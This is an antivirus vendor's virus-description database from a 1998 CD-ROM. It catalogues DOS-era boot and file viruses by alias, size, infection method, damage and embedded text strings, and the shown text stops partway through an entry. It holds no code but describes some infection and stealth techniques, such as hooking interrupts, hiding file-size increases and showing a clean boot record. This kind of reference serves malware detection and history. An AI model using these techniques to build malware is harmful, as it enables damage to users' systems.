home *** CD-ROM | disk | FTP | other *** search
/ PC User 1998 October / Image.iso / utils / pccillan / DATA1.CAB / Program_Executable_Files / Common.vir < prev    next >
Encoding:
Text File  |  1998-08-20  |  1.0 MB  |  33,707 lines

Text Truncated. Only the first 1MB is shown below. Download the file for the complete contents.
  1. [(c)Brain]
  2. Virus Name: (c)Brain
  3. Alias Name: Pakistani, Clone, Nipper
  4. Virus Type: Boot Virus
  5. Virus Length: N/A
  6. Description: This virus infects boot sectors.
  7.  
  8. When an infected file is executed, the virus installs itself into
  9. memory. Total available memory will decrease by 3-7 Kbytes.
  10.  
  11. This virus moves the boot sector and replaces it with a copy of
  12. the virus. The original boot sector will be moved to another
  13. sector and marked as bad. This virus will also change the disk
  14. label to read:
  15.  
  16.     "(c) Brain"
  17.  
  18. The following text is located in the virus:
  19.  
  20.     Welcome to the Dungeon
  21.     (c) 1986 Basit & Amjad (pvt) Ltd.
  22.     BRAIN COMPUTER SERVICES
  23.     730 NIZAB BLOCK ALLAMA IQBAL TOWN
  24.     LAHORE-PAKISTAN
  25.     PHONE :430791,443248,280530.
  26.     Beware of this VIRUS....
  27.     Contact us for vaccination.................
  28.     $#@%$@!!
  29.  
  30. [555]
  31. Virus Name: 555
  32. Alias Name: Dutch 555, Quit-199
  33. Virus Type: File Virus
  34. Virus Length: 555 bytes
  35. Description: This virus infects *.COM and *.EXE files, as well
  36.                     as COMMAND.COM.
  37.  
  38. When an infected file is executed, the virus installs itself into
  39. memory. Total available memory will decrease by 560 bytes.
  40.  
  41. Once the virus is memory resident, it will infect *.COM and *.EXE
  42. files as they are executed. Infected files will increase in size
  43. by 555 bytes, with the virus being located at the end of the
  44. infected file. Infected files will have their date and time records
  45. updated to the date and time the infection occurred.
  46.  
  47. [AirCop]
  48. Virus Name: AirCop
  49. Alias Name:
  50. Virus Type: Boot Virus
  51. Virus Length: N/A
  52. Description: This virus infects boot sectors.
  53.  
  54. When a system is booted from a disk infected by the virus, the
  55. virus will install itself memory resident.  Total system memory
  56. will decrease by 1,024 bytes.
  57.  
  58. Once the virus is memory resident, all unprotected diskettes accessed
  59. will be infected.  The virus will replace the floppy boot sector
  60. with a copy of itself.
  61.  
  62. The virus will show the following message on infected systems:
  63.  
  64.      "Red State, Germ Offensive.
  65.       AIRCOP."
  66.  
  67. [Alameda]
  68. Virus Name: Alameda
  69. Alias Name: Alemeda
  70. Virus Type: Boot Virus
  71. Virus Length: N/A
  72. Description: This virus infects boot sectors.
  73.  
  74. When the system is booted from a disk infected by the virus, the
  75. virus will install itself memory resident.
  76.  
  77. Once the virus is memory resident, all unprotected 5-1/4" 360k
  78. diskettes will be infected when it activates through a warm boot
  79. (CTRL-ALT-DEL). (The virus remains in memory after a warm boot).
  80.  
  81. [Ambulance]
  82. Virus Name: Ambulance
  83. Alias Name: Ambulance Car, RedX
  84. Virus Type: File Virus
  85. Virus Length: 796 bytes
  86. Description: This virus infects *.COM files.
  87.  
  88. When an infected file is executed, the virus will attempt to infect
  89. one *.COM file.
  90.  
  91. Other symptoms include displaying a moving ambulance at the bottom
  92. of the screen as well as playing the sound of a siren.
  93.  
  94. [AntiEXE]
  95. Virus Name: AntiEXE
  96. Alias Name: D3, NewBug, CMOS4
  97. Virus Type: Boot Virus
  98. Virus Length: N/A
  99. Description: This virus infects boot sectors.
  100.  
  101. When the system is booted from a disk infected by the virus, the
  102. virus will install itself memory resident. Total available memory
  103. will decrease by 1,024 bytes.  The virus will also overwrite the
  104. Master Boot Sector with a copy of the virus.
  105.  
  106. Once the virus is memory resident, it will infect all unprotected
  107. diskettes.
  108.  
  109. [Atomic]
  110. Virus Name: Atomic
  111. Alias Name:
  112. Virus Type: File Virus
  113. Virus Length: 371 bytes
  114. Description: This virus infects *.COM files.
  115.  
  116. When an infected file is executed, the virus will infect the first
  117. two *.COM files located in the same directory. The virus will
  118. permanently overwrite the first 371 bytes of the files it infects.
  119. Date and time fields of infected files will not be altered. The
  120. virus will show the following message after infecting a file:
  121.  
  122.     "Bad command or file name"
  123.  
  124. The following text string is located in the virus:
  125.  
  126.     "[TAD1A] Memory Lapse -- Toronto, CANADA"
  127.     "The Atomic Dustbin 1A -- This is just the first
  128.     step"
  129.     "Bad command or file name"
  130.     "*.COM .. c Dustbin 1A -- This is just the first
  131.     step"
  132.  
  133. [Austr_Parasite]
  134. Virus Name: Austr_Parasite
  135. Alias Name: Aussie Parasite
  136. Virus Type: File Virus
  137. Virus Length: 292 bytes
  138. Description: This virus infects *.COM files as well as COMMAND.COM.
  139.  
  140. When an infected file is executed, the virus will install itself
  141. into memory. Total available memory will decrease by 320 bytes.
  142.  
  143. Once the virus is memory resident, all executing *.COM files will
  144. be infected. Infected files will increase in size by 292 bytes,
  145. with the virus being located at the end of the infected file.
  146. Date and time records of infected files will not be altered.
  147.  
  148. Symptoms include system hanging.
  149.  
  150. The following text string is visible in the virus:
  151.  
  152.     "Australian Parasite"
  153.  
  154. [Bljec]
  155. Virus Name: Bljec
  156. Alias Name: Black Jec
  157. Virus Type: File Virus
  158. Virus Length: 231-440 bytes
  159. Description: This virus infects *.COM files.
  160.  
  161. When an infected file is executed, the virus will infect three *.COM
  162. programs in the same directory. Infected files will increase in
  163. size by 231-440 bytes, with the virus being located at the beginning
  164. of the infected file. Infected files will have their date and time
  165. records updated to the date and time the infection occurred.
  166.  
  167. Symptoms include system hanging.
  168.  
  169. [Butterfly]
  170. Virus Name: Butterfly
  171. Alias Name: Butterflies
  172. Virus Type: File Virus
  173. Virus Length: 302 bytes
  174. Description: This virus infects *.COM files.
  175.  
  176. When an infected file is executed, the virus will infect all the
  177. *.COM files located in the same directory.
  178.  
  179. Infected files will increase in size by 302 bytes, with the virus
  180. being located at the end of the infected file. Infected files will
  181. not have their date and time records altered.
  182.  
  183. The following text string is located in the virus:
  184.  
  185.     "Goddamn Butterflies"
  186.     "*.COM"
  187.  
  188. [Connie]
  189. Virus Name: Connie
  190. Alias Name:
  191. Virus Type: File Virus
  192. Virus Length: 1,761 bytes
  193. Description: This virus infects *.COM files, as well as COMMAND.COM.
  194.  
  195. When an infected file is executed, the virus installs itself into
  196. memory. Total available memory will decrease by 3,520 bytes.
  197.  
  198. Once the virus is memory resident, it will infect *.COM files when
  199. they are executed, opened, or copied. Infected files will increase
  200. in size by 1,761 bytes, with the virus being located at the
  201. end of the infected file. The date and time information of infected
  202. files will not be altered.
  203.  
  204. The following text string can be found in the virus:
  205.  
  206.     "This is <Connie> Written by Dark Slayer in
  207.     Keelung TAIWAN P:\COMMAND.COM"
  208.  
  209. [CVirus]
  210. Virus Name: CVirus
  211. Alias Name: Nowhere Man, VMessi
  212. Virus Type: File Virus
  213. Virus Length:
  214. Description: This virus infects *.COM  and *.EXE files that are
  215.                     larger than 6,300 bytes in size.
  216.  
  217. When an infected file is executed, the virus will search for a
  218. suitable file to infect (larger than 6,300 bytes in size). Infected
  219. files will have the first original 6,286 bytes overwritten by the
  220. virus. Date and time information of infected files will not be
  221. altered. Once a file is successfully infected, the following message
  222. will be displayed on the screen:
  223.  
  224.     "Out of memory"
  225.  
  226. If infection is not possible, the following message will be displayed:
  227.  
  228.     "All files infected.  Mission complete."
  229.  
  230. The following text string can be found in the virus:
  231.  
  232.     "NMAN"
  233.     "BMAN"
  234.     "*.EXE"
  235.  
  236. [DataLock]
  237. Virus Name: DataLock
  238. Alias Name: Datalock.920.A, V920
  239. Virus Type: File Virus
  240. Virus Length: 920 bytes
  241. Description: This virus infects *.COM and *.EXE files.
  242. PC Vectors Hooked: INT 21h
  243.  
  244. Infection method: When an infected file runs, the virus loads itself
  245. into memory. While loaded, it infects any file that executes.
  246. Infected files increase by 920 bytes.
  247.  
  248. Damage: After August 1990, the virus won't allow files with the
  249. extension .?BF to be opened. When an attempt is made, it displays
  250. the erroneous error message "Too many files open."
  251.  
  252. [Denzuko]
  253. Virus Name: Denzuko
  254. Alias Name: Den Zuk
  255. Virus Type: Boot Virus
  256. Virus Length: N/A
  257. Description: This virus infects boot sectors.
  258.  
  259. Infection method: When the system attempts to boot from an infected
  260. diskette, the virus loads itself into memory--even if the boot fails.
  261. While loaded, the virus attempts to infect any accessed diskette.
  262.  
  263. Damage: When <Ctrl><Alt><Del> is pressed, the message "Den Zuk" is
  264. displayed and the system seems to reboot. However, the virus remains
  265. in memory. Because the virus was designed for 360 KB diskettes,
  266. it unintentionally destroys data on 3.5 inch or 1.2 MB diskettes.
  267.  
  268. [Die_Hard_2]
  269. Virus Name: Die_Hard_2
  270. Alias Name: DH2
  271. Virus Type: File Virus
  272. Virus Length: 4,000 bytes
  273. Description: This virus infects *.COM and *.EXE files.
  274. Interrupt vectors hooked: INT 21h
  275.  
  276. Infection method: When an infected file runs, the virus loads itself
  277. into memory. While loaded, it infects accessed executable files.
  278. Infected files increase by 4,000 bytes.
  279.  
  280. Damage: Under analysis
  281.  
  282. [Dir]
  283. Virus Name: Dir
  284. Alias Name: DIR
  285. Virus Type: File Virus
  286. Virus Length: 691 bytes
  287. Description: See Dir-2
  288.  
  289. [Dir-2]
  290. Virus Name: Dir-2
  291. Alias Name: Dir-II, Creeping Death
  292. Virus Type: File Virus
  293. Virus Length: 1,024 bytes
  294. Description: This virus infects *.COM and *.EXE files.
  295. PC Vectors Hooked: None
  296.  
  297. Execution Procedure:
  298. 1) When the virus loads itself resident in memory it will change
  299.     the directory structure data so that certain executable files
  300.     are linked to itself.
  301. 2) This allows the virus to execute when you execute a file to which
  302.     the DIR2-910 virus is linked to. At this point it can begin to
  303.     infect other files.
  304. 3) The virus stays resident in memory but doesn't hook any interrupts.
  305.     It uses another function to infect files. It infects .COM and
  306.     .EXE files when they are "READ & WRITE".
  307.  
  308. Damage: When all the .COM and .EXE files are infected on a disk, it
  309. will not be possible to execute any files from the disk.
  310.  
  311. Detection Method: Check the disk by using "CHKDSK.EXE"; if some files
  312. are cross-linked to the same position, then these files must be
  313. infected.
  314.  
  315. Note: DIR2-910 doesn't hook INT 24h when infecting files. It omits
  316. I/O errors (such as write protect).
  317.  
  318. [Disk_Killer]
  319. Virus Name: Disk_Killer
  320. Alias Name: Ogre
  321. Virus Type: Boot Virus
  322. Virus Length: N/A
  323. Description: This virus infects boot sectors.
  324.  
  325. Infection method: When the system is booted from an infected disk,
  326. the virus loads itself into memory.
  327.  
  328. Damage: After the computer has been on for 48 hours, the virus
  329. displays the following message and then encrypts all the data on
  330. the hard disk:
  331.  
  332. "Disk Killer -- Version 1.00 by COMPUTER OGRE
  333.  04/01/1989
  334.  
  335.  Warning!!
  336.  Don't turn off the power or
  337.  remove the diskette while Disk Killer is Processing.
  338.  Processing.
  339.  Now you can turn off the power. I wish you luck."
  340.  
  341. [EDV]
  342. Virus Name: EDV
  343. Alias Name: Cursy
  344. Virus Type: Boot Virus
  345. Virus Length: N/A
  346. Description: This virus infects boot sectors.
  347.  
  348. When the system is booted from a disk infected by the virus, the
  349. virus will install itself into memory.
  350.  
  351. Once the virus is memory resident, it will infect any accessed floppy
  352. disks. It will move the original boot sector, replacing it with a
  353. copy of the virus.
  354.  
  355. Once the virus has infected six disks, it will disable the keyboard
  356. as well as corrupt all disks in the system.  Once completed, the
  357. following message will be displayed on the screen:
  358.  
  359.     "That rings a bell, no?  From Cursy"
  360.  
  361. The following string can be found in infected boot sectors:
  362.  
  363.     "MSDOS Vers. E.D.V."
  364.  
  365. [Exebug]
  366. Virus Name: Exebug
  367. Alias Name: Swiss Boot, CMOS killer
  368. Virus Type: Boot Virus
  369. Virus Length: N/A
  370. Description: This virus infects boot sectors.
  371. PC Vectors Hooked: INT 13h
  372.  
  373. Infection method: When the system is booted from an Exebug infected
  374. diskette, the Exebug virus will install itself memory resident at
  375. the top of system memory but below the 640K DOS boundary,
  376. moving interrupt 12's return.  Total system and available free
  377. memory will decrease by 1,024 bytes.  Also at this time, the virus
  378. will infect the system hard disk's master boot sector.
  379.  
  380. Damage: Master boot sector corruption; decrease in total system
  381. and available free memory; inability to access drive C: after diskette
  382. boot.
  383.  
  384. [Fat_Table]
  385. Virus Name: Fat_Table
  386. Alias Name:
  387. Virus Type: File Virus
  388. Virus Length: 6,540 bytes
  389. Description: This virus infects *.EXE  files.
  390.  
  391. When an infected file is executed, the virus will infect one *.EXE
  392. file located in the same directory.  The virus will overwrite the
  393. first 6,540 bytes of the original file. Date and time information of
  394. infected files will be updated to the time of infection.
  395.  
  396. The following text string can be found in the virus:
  397.  
  398.     "hitohana"
  399.     "karu ba"
  400.     "rb C:\ * .* FAT TABLE E"
  401.     "8RROR"
  402.     "EXE"
  403.     "COM"
  404.  
  405. [Filler.A]
  406. Virus Name: Filler.A
  407. Alias Name: Filler
  408. Virus Type:   Boot Virus
  409. Virus Length: N/A
  410. Description: This virus infects boot sectors.
  411.  
  412. Infection method: When the system is booted from an infected floppy,
  413. the virus loads itself into memory. While loaded, it infects any
  414. accessed, non-protected disks. The DOS CHKDSK program will
  415. show a "total bytes memory" decrease of 8,192 bytes.
  416.  
  417. Damage: Under analysis
  418.  
  419. [Flip]
  420. Virus Name: Flip
  421. Alias Name:
  422. Virus Type:   Boot Virus
  423. Virus Length: 2,672 bytes
  424. Description: This virus infects *.COM and *.EXE files.
  425. PC Vectors Hooked: INT 21h
  426.  
  427. Infection Process: This virus spreads by executing an infected
  428. program or by booting the system with an infected disk. There are
  429. several methods of infection.
  430.  
  431. 1) Infection of a clean system by an infected program.
  432.  
  433. When an infected program is executed in a clean system, the virus
  434. will copy itself in the last side of the last cylinder, beginning
  435. from the 5th last sector to the 1st last sector and the virus
  436. will subtract the DOS boot sector at offset 0x13h (Number of logical
  437. sectors) with 6. Finally, the virus code is written onto the partition
  438. sector.
  439.  
  440. 2) Spreading the infection through an infected disk.
  441.  
  442. If a PC is booted from an infected disk, the spreading of the infection
  443. is complete.  The boot code, previously overwritten by the virus on the
  444. disk partition sector, reads the main core of the virus from the last
  445. 5 sectors to the last sector, and loads it as a TSR in RAM, occupying
  446. 3 Kb of the higher part of system memory.  As soon as it is installed
  447. as a TSR, the virus takes control of Int 1Ch (Timer Interrupt) to
  448. verify, with a frequency of 18.2 times per second, if the DOS
  449. COMMAND.COM is loaded.  If DOS is present, the virus restores the
  450. timer and takes control of Int 21h.
  451.  
  452. Damage: Loss of data stored in the 6th last to 1st last sectors of the
  453. disk. Virus also increases file sizes.
  454.  
  455. Symptoms: Virus turns screen display upside down (rotates 180 degrees).
  456. File sizes increase by 2,153 bytes.
  457.  
  458. Note: The virus uses a smart technique to avoid anti-virus detection
  459. programs, when modifying the partition sector, that is hooking int
  460. 01h, it will turn on a single step flag to get the original
  461. entry of DOS hooked of INT 13h . The virus will then move itself to
  462. the top of the MCB (memory control block), and decrease available
  463. memory in the MCB by 2672 (A70h) bytes. It will hook Int 21h
  464. with the same method as for INT 13h and then proceeds to run the
  465. original program.
  466.  
  467. [Form.A]
  468. Virus Name: Form.A
  469. Alias Name: FORM, Form, Form 18, Generic
  470. Virus Type: Boot Virus
  471. Virus Length: N/A
  472. Description: This virus infects boot sectors.
  473. PC Vectors Hooked: INT 13h, INT 09h
  474.  
  475. Infection method: When the system is booted from an infected diskette,
  476. the virus infects the DOS boot sector and loads itself into memory.
  477. While loaded, it infects any accessed, non-protected disks. The DOS
  478. CHKDSK program will indicate 653,312 bytes of free memory.
  479.  
  480. Damage: On the 18th day of any month, the virus will emit a clicking
  481. sound whenever keys are pressed. The system may hang when a read
  482. error occurs, and parts of the original boot sector may be
  483. overwritten, making the partition unbootable.
  484.  
  485. [Friday_13th]
  486. Virus Name: Friday_13th
  487. Alias Name: Friday the 13th, Virus 1813, Israelian, Jerusalem
  488. Virus Type: File Virus
  489. Virus Length: approx. 1,813 bytes
  490. Description: This virus infects *.COM and *.EXE files.
  491. PC Vectors Hooked:  Int 21
  492.  
  493. Execution Procedure:
  494. 1) The virus checks whether it is already loaded resident in memory.
  495.     If "No", it then loads itself resident into memory by hooking INT
  496.     21h.
  497. 2) It then executes the original file.
  498. 3) With itself loaded resident in memory it will infect any uninfected
  499.     file that is executed.
  500.  
  501. Damage: In the year 1987, the virus does no damage. It proceeds only
  502. to infect other files. Every Friday the 13th, excluding the year 1987,
  503. the virus deletes every executed program . All other days, excluding
  504. the year 1987, the virus spreads.  About half an hour after the virus
  505. is installed in memory it scrolls up by two lines a small window
  506. with coordinates (5, 5), (16, 16) and slows down computer speed.
  507. Delay loop repeats 18.5 times per second.
  508.  
  509. Detection Method: Increases the file length by 1813 bytes.
  510.  
  511. Note: Loads itself resident in memory.  An error message appears if
  512. there is an I/O error (such as write protect).
  513.  
  514. [Frodo.Frodo.A]
  515. Virus Name: Frodo.Frodo.A
  516. Alias Name: 4096, IDF, 4096-1, Frodo, Frodo.Frodo.A, 100 Year
  517. Virus Type: File Virus
  518. Virus Length: 4,096 bytes
  519. Description: This virus infects *.COM and *.EXE files.
  520. PC Vectors Hooked: INT 21h, INT 13h
  521.  
  522. Infection method: When an infected file runs, the virus loads itself
  523. in memory. While loaded, it infects accessed executable files. The
  524. virus increases the size of infected files by 4096 bytes.
  525.  
  526. Damage: After September 21, the virus tries to modify the boot sector
  527. to display "FRODO LIVES." However, the virus code is corrupted, so
  528. instead of modifying the system areas, it crashes the system.
  529.  
  530. Note: While the virus is in memory, it hides the increase in infected
  531. file sizes.
  532.  
  533. [Generic_408]
  534. Virus Name: Generic_408
  535. Alias Name: NYB, B1
  536. Virus Type: Boot Virus
  537. Virus Length: N/A
  538. Description: This virus infects boot sectors.
  539.  
  540. Infection method: When the system is booted from an infected diskette,
  541. the virus infects the master boot record and loads itself in memory.
  542. While loaded, it infects any accessed, non-protected disks.
  543.  
  544. Damage: None known
  545.  
  546. [Generic_437]
  547. Virus Name: Generic_437
  548. Alias Name: Boot-437
  549. Virus Type: Boot Virus
  550. Virus Length: N/A
  551. Description: This virus infects boot sectors.
  552.  
  553. This virus will only infect hard drives when an attempt to boot
  554. from an infected diskette is made. Once the virus has infected
  555. the hard drive, all non-protected floppies used in the machine will
  556. be infected.
  557.  
  558. Unlike most other boot sector viruses (except Form), Boot-437
  559. infects the DOS boot sector on hard drives instead of the Master
  560. Boot Record.
  561.  
  562. [GreenCat]
  563. Virus Name: GreenCat
  564. Alias Name: Green Caterpillar, Green_Caterpillar.1575.A, Find, 1591,
  565.                    1575
  566. Virus Type: File Virus
  567. Virus Length: 1,991 to 2,005 bytes
  568. Description: This virus infects *.COM and *.EXE files.
  569. PC Vectors Hooked: INT 21h
  570.  
  571. Infection method: When an infected file runs, the virus loads itself
  572. in memory.
  573.  
  574. Damage: After a specific time period has elapsed, the execution of
  575. an infected file causes a green caterpillar to run across the screen,
  576. excreting the screen contents as it goes. There is no permanent
  577. damage.
  578.  
  579. [Grog31]
  580. Virus Name: Grog31
  581. Alias Name: Grog 3.1
  582. Virus Type: File Virus
  583. Virus Length: 1,200 bytes
  584. Description: This virus infects *.COM files as well as COMMAND.COM.
  585.  
  586. When an infected file is executed, the virus installs itself into
  587. memory. Total available memory will decrease by 4,800 bytes. The
  588. virus will also infect COMMAND.COM.
  589.  
  590. Once the virus is memory resident, it will infect *.COM files
  591. that are larger than 2,000 bytes when they are executed or opened.
  592. Infected files will increase in size by 1,200 bytes, with the virus
  593. being located at the beginning of the infected file. Date and time
  594. information of infected files will not be altered.
  595.  
  596. The following text string can be found in the virus:
  597.  
  598.     "GROG 4EVER!"
  599.     "GROG v3.1 (C) '93 by GROG - Italy"
  600.     "Microsoft C:\COMMAND.COM"
  601.  
  602. [Hacktic2]
  603. Virus Name: Hacktic2
  604. Alias Name:
  605. Virus Type: File Virus
  606. Virus Length: 83 bytes
  607. Description: Infects *.COM and *.EXE files, including COMMAND.COM.
  608.  
  609. When an infected file is executed, the virus will infect one file
  610. in the current directory, truncating the file size to 83 bytes as
  611. well as changing the file attribute to "hidden."  The date and time
  612. information of infected files will be updated to the time of infection.
  613.  
  614. [Hobbit]
  615. Virus Name: Hobbit
  616. Alias Name:
  617. Virus Type: File Virus
  618. Virus Length: 505 bytes
  619. Description: This virus infects *.EXE files.
  620.  
  621. When an infected file is executed, the virus installs itself into
  622. memory. Total available memory will decrease by 1,440 bytes.
  623.  
  624. Once the virus is memory resident, it will infect *.EXE when they
  625. are executed or opened.  The virus will overwrite the first 505
  626. bytes of the file. Date and time information of infected files will
  627. not be altered.
  628.  
  629. The following text string can be found in the virus:
  630.  
  631.     "HOBIT"
  632.  
  633. [Jerusalem]
  634. Virus Name: Jerusalem
  635. Alias Name: Israeli, Jerusalem.1808.Standard, 1808, Israeli,
  636.                    1813 Jeru-3-3, Jerusalem.1808.Critical.
  637. Virus Type: File Virus
  638. Virus Length: 1,808 to 1,822 bytes
  639. Description: This virus infects *.COM and *.EXE files.
  640. PC Vectors Hooked: INT 21h, INT 08h
  641.  
  642. Infection method: When an infected file runs, the virus loads itself
  643. in memory. While loaded, it infects any file that executes, except the
  644. COMMAND.COM file. The virus increases the size of .EXE files by
  645. 1,808-1,822 on the first infection and 1,808 bytes with each
  646. reinfection. Infected .COM files increase by 1,813 bytes.
  647.  
  648. Damage: On Friday the 13th, after the virus has been resident for 30
  649. minutes, it deletes files that are executed. On other days, the virus
  650. slows down the system 30 minutes after each infection. It also wipes
  651. out an area of the screen, though nothing is displayed. A bug in the
  652. virus can cause .EXE file to be infected repeatedly until they
  653. become too large to execute.
  654.  
  655. [Joshi]
  656. Virus Name: Joshi
  657. Alias Name: Happy Birthday Joshi
  658. Virus Type: Boot Virus
  659. Virus Length: N/A
  660. Description: This virus infects boot sectors.
  661.  
  662. Detection Method: The first "Joshi" virus was detected in India in June
  663. 1990. It is a very popular virus in India.  Virus remains resident in
  664. the boot sector or in FAT area. Every January 5, the virus displays:
  665. "Type Happy Birthday Joshi." All will return to normal if the user
  666. types the above message. System memory decreases by 6KB when virus
  667. is resident.
  668.  
  669. Note: Loads itself resident in memory. An error message appears if
  670. there is an I/O error (such as write protect).
  671.  
  672. [Jumper]
  673. Virus Name: Jumper
  674. Alias Name: 2kb
  675. Virus Type:   File Virus
  676. Virus Length: 2,048 bytes
  677. Description: This virus infects *.COM and *.EXE files and COMMAND.COM.
  678.  
  679. When an infected file is first executed in a clean system, the
  680. virus will load itself into memory. Total memory will decrease by
  681. 8,336 bytes. Once the virus is memory resident, it will infect
  682. *.COM and *.EXE files as they are executed. Infected files will have
  683. a file length increase of 2,048 bytes. The date and time information of
  684. infected files will not be altered.
  685.  
  686. The following text string is located in infected programs:
  687.  
  688.      "BIOS"
  689.  
  690. [Junkie.A-1]
  691. Virus Name: Junkie.A-1
  692. Alias Name: Junkie
  693. Virus Type: File Virus
  694. Virus Length: N/A
  695. Description: This virus infects *.COM and *.EXE files.
  696. PC Vectors Hooked: INT 1Ch, INT 21h
  697.  
  698. Infection method: The first time an infected file runs, the virus
  699. overwrites the hard disk's master boot record. When the system is
  700. booted again (or when it is booted from an infected diskette), the
  701. virus loads itself in memory. While loaded, the virus infects any
  702. .COM file that executes and any accessed diskettes. The DOS CHKDSK
  703. program will show a "total bytes memory" decrease of 3,072 bytes.
  704. Infected files increase by just over 1,000 bytes.
  705.  
  706. Damage: None known
  707.  
  708. [K_Hate]
  709. Virus Name: K_Hate
  710. Alias Name: K-Hate
  711. Virus Type: File Virus
  712. Virus Length: 1,237 to 1,304 bytes
  713. Description: This virus infects *.COM files including COMMAND.COM.
  714.  
  715. When an infected file is executed, the virus will infect all *.COM
  716. files in the same directory. Infected files will experience a file
  717. length increase of 1,237 to 1,304 bytes with the virus being located at
  718. the end of the file.  Date and time information of infected files will
  719. not be altered.
  720.  
  721. The following text string can be found in the virus:
  722.  
  723.     "CRYPT INFO"
  724.     "KDG 0,5 / Khntark3"
  725.     "*, K-HATE / Khntark*.COM"
  726.  
  727. [Kampana.A]
  728. Virus Name: Kampana.A
  729. Alias Name: Telecom Boot, Campa, Anti-Tel, Brasil
  730. Virus Type: Boot Virus
  731. Virus Length: N/A
  732. Description: This virus infects boot sectors.
  733. PC Vectors Hooked: INT 13h
  734.  
  735. Infection method: When the system is booted from an infected diskette,
  736. the virus loads itself in memory. While loaded, it infects any accessed
  737. disks. The DOS CHKDSK program will show a "total bytes memory" decrease
  738. of 1,024 bytes.
  739.  
  740. Damage: After a number of reboots, the virus overwrites sectors of the
  741. hard disk.
  742.  
  743. Note: If you attempt to examine the master boot record while the virus
  744. is loaded, it will display the original, uninfected version.
  745.  
  746. [KeyKapture]
  747. Virus Name: KeyKapture
  748. Alias Name: KeyKap, Hellspawn.1
  749. Virus Type: File Virus
  750. Virus Length: 1,074 bytes
  751. Description: Infects *.EXE files by creating a hidden *.COM file of the
  752.                     same name in the same directory.
  753.  
  754. When an infected file is executed, the virus installs itself into
  755. memory. Total available memory will decrease by 3,072 bytes.
  756.  
  757. Once the virus is memory resident, it will infect *.EXE when they are
  758. executed by creating a 1,074 byte *.COM file of the same name. The
  759. original *.EXE file will not be changed in any way. Infected systems
  760. may experience system hangs.
  761.  
  762. The following text string can be found in the virus:
  763.  
  764.     "KKV.90 KeyKapture Virus v0.90 [Hellspawn-II]
  765.      (c) 1994 by Stormbringer [PS]"
  766.  
  767. [MacGyver]
  768. Virus Name: MacGyver
  769. Alias Name:
  770. Virus Type: File Virus
  771. Virus Length: 2,824 bytes
  772. Description: This virus infects *.EXE files.
  773.  
  774. Infection method:  When the infected program is executed, the MacGyver
  775. virus will install itself memory resident as a low system memory TSR
  776. of 3,072 bytes. When the MacGyver virus is memory resident, it will
  777. infect .EXE programs when they are executed or opened.  The following
  778. text string is visible within the MacGyver viral code in all infected
  779. programs:
  780.  
  781.     "SCANVIR.SHW"
  782.  
  783. Damage: It may cause frequent system hangs when .EXE programs are
  784. executed. The DOS CHKDSK program will indicate file allocation errors
  785. on all infected files when the virus is memory resident.
  786.  
  787. [Metal_Militia]
  788. Virus Name: Metal_Militia
  789. Alias Name: MMIR, Immortal Riot
  790. Virus Type: File Virus
  791. Virus Length: 282 bytes
  792. Description: This virus infects *.COM  files, as well as COMMAND.COM.
  793.  
  794. When an infected file is executed, the virus installs itself into
  795. memory. Total available memory will decrease by 3,072 bytes.
  796.  
  797. Once the virus is memory resident, it will infect *.COM files when
  798. they are executed.  Infected files will increase in size by 1,054-5
  799. bytes, with the virus being located at the beginning of the infected
  800. file. Date and time information of infected files will not be altered.
  801.  
  802. The following text string can be found in the virus:
  803.  
  804.   "Senseless Destruction..."
  805.   "Protecting what we are joining together to take
  806.    on the world.."
  807.   "METAL MiLiTiA [iMMORTAL RIOT] SVW"
  808.  
  809. [Michelangelo]
  810. Virus Name: Michelangelo
  811. Alias Name:
  812. Virus Type: Boot Virus
  813. Virus Length: N/A
  814. Description: This virus infects disk boot sectors.
  815.  
  816. When the system is booted from a disk infected with the Michelangelo
  817. virus, the virus will install itself into memory. Total available
  818. memory will decrease by 2,048 bytes.
  819.  
  820. Once the virus is memory resident, it will infect diskette boot sectors
  821. on access.  The virus will move the original boot sector and replace
  822. it with a copy of the virus.
  823.  
  824. This virus activates on March 6.  It will format the hard disk,
  825. overwriting all existing data.
  826.  
  827. [Monkey]
  828. Virus Name: Monkey
  829. Alias Name: Stoned.Empire.Monkey.B, Monkey 2
  830. Virus Type: Boot Virus
  831. Virus Length: N/A
  832. Description: This virus infects boot sectors.
  833.  
  834. Infection method: When the system is booted with an infected diskette,
  835. the virus loads itself in memory. While loaded, it infects any
  836. accessed, non-protected disks. The DOS CHKDSK program will show a
  837. "total bytes memory" decrease of 1,024 bytes. Monkey-1 is one of the
  838. few viruses that can successfully infect floppies while Microsoft
  839. Windows is running.
  840.  
  841. Damage: The virus encrypts the partition table of the master boot
  842. record. If you attempt to boot from a clean floppy, the disk will
  843. be inaccessible because the partition table has been moved.
  844.  
  845. Note: If you attempt to examine the master boot record while the
  846. virus is in memory, it will display the original, uninfected version.
  847.  
  848. Caution: Do not use FDISK /MBR to clean this virus.
  849.  
  850. [Mummy]
  851. Virus Name: Mummy
  852. Alias Name:
  853. Virus Type: File Virus
  854. Virus Length: 1,300 - 1,503 bytes
  855. Description: This virus infects *.EXE files.
  856.  
  857. Execution Procedure:
  858. 1) The virus checks whether it is already loaded resident in memory.
  859.     If "No", it then loads itself resident into memory by hooking
  860.     INT 21h.
  861. 2) It then executes the original file.
  862. 3) With itself loaded resident in memory it will infect any uninfected
  863.     file that is executed.
  864.  
  865. Damage: This virus has several variants. While some variants have no
  866. damage routine, some will slow down the system performance and variants
  867. of the Mummy virus will have a Random Number counter. When the counter
  868. reaches zero, the virus will overwrite the first part of the hard disk
  869. and cause severe data loss.
  870.  
  871. Detection Method: Increases infected file size by 1,300-1,503 bytes.
  872. Virus occasionally hangs the system when the virus is resident in
  873. memory. Encrypted text strings inside the virus code:
  874.  
  875.     "Mummy Version x.xxx",
  876.     "Kaohsiung Senior School",
  877.     "Tzeng Jau Ming presents",
  878.     "Series Number=[xxxxx]."
  879.  
  880. Note: Loads itself resident in memory. An error message appears if
  881. there is an I/O error (such as write protect).
  882.  
  883. [Natas]
  884. Virus Name: Natas
  885. Alias Name: Satan, Sat_Bug.Natas, Natas-4, Natas-6
  886. Virus Type: File Virus
  887. Virus Length: 4,746 bytes
  888. Description: This virus infects *.COM and *.EXE files.
  889. PC Vectors Hooked: INT 13h, INT 21h
  890.  
  891. Infection method: When the system is booted with an infected disk,
  892. the virus loads itself in memory and infects the master boot record.
  893. While loaded, it infects any accessed executable files or diskettes.
  894. Total system memory decreases by 5,664 bytes. Infected files increase
  895. in length by 4,744 bytes.
  896.  
  897. Damage: The virus formats the hard disk and destroys data stored on
  898. diskettes.
  899.  
  900. [No_of_Beast]
  901. Virus Name: No_of_Beast
  902. Alias Name: No. of the Beast,
  903. Number_of_the_Beast.E, DARTH, 666, 512
